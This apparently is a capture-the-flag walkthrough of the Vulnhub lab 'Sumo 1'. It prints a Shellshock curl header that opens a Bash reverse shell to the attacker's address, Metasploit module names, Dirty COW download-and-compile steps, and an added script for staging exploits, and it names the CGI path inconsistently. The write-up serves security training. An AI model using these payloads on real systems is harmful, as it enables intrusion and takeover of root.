SUMO 1 – Vulnhub Walkthrough

This write-up is about Sumo 1, a simple vulnerable machine.
It is a beginner boot2root challenge from Vulnhub; the goal is to find the flag hidden inside the machine.

I also used RustScan for network scanning, a new tool that is a bit faster than traditional Nmap.

Let me explain more about it further on!

PTES Methodology:

Information Gathering:

• Netdiscover
• RustScan

Vulnerability Analysis:

• Using Nikto.
• Using dirb.

Exploitation:

• Exploiting Shellshock Vulnerability using Metasploit.
• Gaining session using Meterpreter.

Post Exploitation:

• Enumerating for Privilege Escalation.

At last, capture the flag 🏁

Information Gathering:

First let's find the IP address assigned to the machine. For that I am using the commonly used Netdiscover tool.

kali@kali:~$ sudo netdiscover


After a few seconds of scanning I discovered the IP address 192.168.70.128. To confirm it, let's open the IP in the browser.

Now I am going to scan for the services running on the host 192.168.70.128 using RustScan.

Traditionally in penetration testing we use the popular tool Nmap, but recently I came across RustScan, which claims to be faster than Nmap, so I just wanted to give it a try.

RustScan scanned the ports in 13.08 seconds and found ports 22 (SSH) and 80 (HTTP) open.
Personally, I still prefer Nmap over RustScan. The port scan by itself did not give much information.

You can download RustScan from here https://github.com/RustScan/RustScan/releases

Now let's go to the next phase.

Vulnerability Analysis

I didn't find much in the network scan or on the web page itself, so let's enumerate the directories of the web server.

For this I am going to use the simple dirb tool.

kali@kali:~$ dirb http://192.168.70.128

Here I found http://192.168.70.128/cgi-bin/.

Let's check whether /cgi-bin/ is directly accessible.

Oops! That is a dead end.

Since /cgi-bin/ exists, I checked whether it has any known vulnerability or exploit.
That is how I came across Shellshock (CVE-2014-6271), an old Bash vulnerability that has long been patched upstream but still turns up on unmaintained hosts.

I tried my luck with Nikto to confirm whether the host really is vulnerable to Shellshock.

kali@kali:~$ nikto -h 192.168.70.128

I was lucky: Nikto reported that the site is vulnerable to Shellshock.
Then I opened the script it reported in the browser.

I am able to access /cgi-bin/test.sh.

To know more about shellshock, https://en.wikipedia.org/wiki/Shellshock_(software_bug)

Now that I know the host is vulnerable to Shellshock, my next step is to exploit the vulnerability.

Exploitation:

Shellshock is a code injection vulnerability in Bash: anything an attacker can place in an environment variable (here, HTTP request headers that Apache passes to the CGI script) gets executed as a command. I am going to exploit it the easy way, with Metasploit.

To start Metasploit in Kali, type msfconsole in the terminal.

Use the search command to list all Shellshock modules. You can also use searchsploit in the terminal to find the exploits available.

Now we need to choose the right module for the vulnerable machine.

First I ran the auxiliary scanner against the target host to confirm the Shellshock vulnerability.

msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env

And I got the result of the scan.

Don't forget to set the TARGETURI option to the path of the vulnerable CGI script.

Let's exploit! The matching exploit module is exploit/multi/http/apache_mod_cgi_bash_env_exec, with the same RHOSTS and TARGETURI.

I got a meterpreter session. Now let's explore more.

The machine runs an old Ubuntu 12.04 with a Linux 3.2.0 kernel. This must be interesting.

Since the machine is running Ubuntu 12.04 with that kernel, a quick search showed that it is affected by a local privilege escalation vulnerability.

But so far I only have limited, low-privileged access.

Post Exploitation:

Getting a reverse shell on this machine was easy: the same Shellshock header, this time carrying a Bash reverse shell back to my Kali box (192.168.70.129):

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.70.129/9001 0>&1' http://192.168.70.128/cgi-bin/test/test.cgi

Before sending it I was already listening on port 9001 with Netcat:

kali@kali:~$ nc -lvnp 9001

For privilege escalation I used the famous Dirty COW exploit (CVE-2016-5195; the /etc/passwd variant from Exploit-DB 40839, see references). It is compiled with:

gcc -pthread dirty.c -o dirty -lcrypt

To get the exploit onto the target I went to the /tmp directory (writable for everybody) and used wget to download it from my machine.

Before that I hosted the exploit from my local machine with Python's built-in HTTP server, run from the directory containing dirty.c:

python -m SimpleHTTPServer 91 (on Python 3: python3 -m http.server 91)

Then, on the target, run:

wget http://192.168.70.129:91/dirty.c

Use your own IP address here.

Now I have successfully transferred the exploit code onto the vulnerable machine.

Then I compiled dirty.c on the host, but gcc threw an error.

After checking Google I found the cause: the shell spawned through CGI has an almost empty PATH, so gcc cannot find its helper programs. Extending PATH with the usual bin directories and gcc's own directory lets it compile without errors:

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/; export PATH


Now the exploit compiles. Running it writes a new uid-0 user with a password of my choosing into /etc/passwd, so the only thing left to do is log in over SSH (port 22) as that user.

Boom! I gained root access to the vulnerable machine and the flag is captured.
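To tie the post-exploitation steps together, here is an added example (my own helper, not code from the original walkthrough) that stages an exploit source file from the attacker box into /tmp on the target and repairs the CGI shell's PATH before compiling. The attacker address, port and file name are placeholders passed in by the caller; wget and gcc are assumed to exist on the target, and the gcc directory is the one this machine needed.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: staging a local exploit
# from the attacker box into /tmp on the target and fixing the CGI shell's
# PATH before compiling. Assumptions: attacker IP/port and the exploit source
# file name are passed in; wget and gcc exist on the target.

# Append each directory to PATH once (skip ones already present), so the fix
# can be re-run safely from a shell that keeps dying. Prints the new PATH.
fix_path() {
    new="$PATH"
    for dir in "$@"; do
        case ":$new:" in
            *":$dir:"*) ;;                       # already there, keep order
            *) new="${new:+$new:}$dir" ;;
        esac
    done
    PATH="$new"
    export PATH
    printf '%s\n' "$PATH"
}

# Attacker side: serve the current directory (holding dirty.c) over HTTP,
# using whichever Python is available.
serve_exploit_dir() {
    port="$1"
    if command -v python3 >/dev/null 2>&1; then
        python3 -m http.server "$port"
    else
        python -m SimpleHTTPServer "$port"
    fi
}

# Target side: fetch the source into /tmp, repair PATH, check that the
# compiler is reachable, then build. Returns non-zero on any failure so the
# caller knows which step went wrong instead of guessing from a dead shell.
stage_and_build() {
    lhost="$1"; lport="$2"; src="$3"
    cd /tmp || { echo "cannot cd /tmp"; return 1; }
    wget -q "http://$lhost:$lport/$src" || { echo "download failed"; return 1; }
    fix_path /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin \
             /usr/lib/gcc/x86_64-linux-gnu/4.8 >/dev/null
    command -v gcc >/dev/null 2>&1 || { echo "gcc not in PATH"; return 1; }
    gcc -pthread "$src" -o "${src%.c}" -lcrypt
}
```

Usage: on Kali, `serve_exploit_dir 91` in the directory holding dirty.c; in the reverse shell on the target, `stage_and_build 192.168.70.129 91 dirty.c` leaves /tmp/dirty ready to run. The PATH fix is written so that repeating it after a shell drops does not keep growing the variable.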


References:

Dirty COW exploit source (/etc/passwd method): https://www.exploit-db.com/raw/40839
Dirty COW (Wikipedia): https://en.wikipedia.org/wiki/Dirty_COW
The Unix PATH variable: https://www.cs.purdue.edu/homes/bb/cs348/www-S08/unix_path.html
How to change the PATH variable in Linux: https://www.thegeekdiary.com/how-to-change-the-path-variable-in-linux/
RustScan: https://github.com/RustScan/RustScan
Exploit-DB 40938: https://www.exploit-db.com/exploits/40938/
Shellshock (Wikipedia): https://en.wikipedia.org/wiki/Shellshock_(software_bug)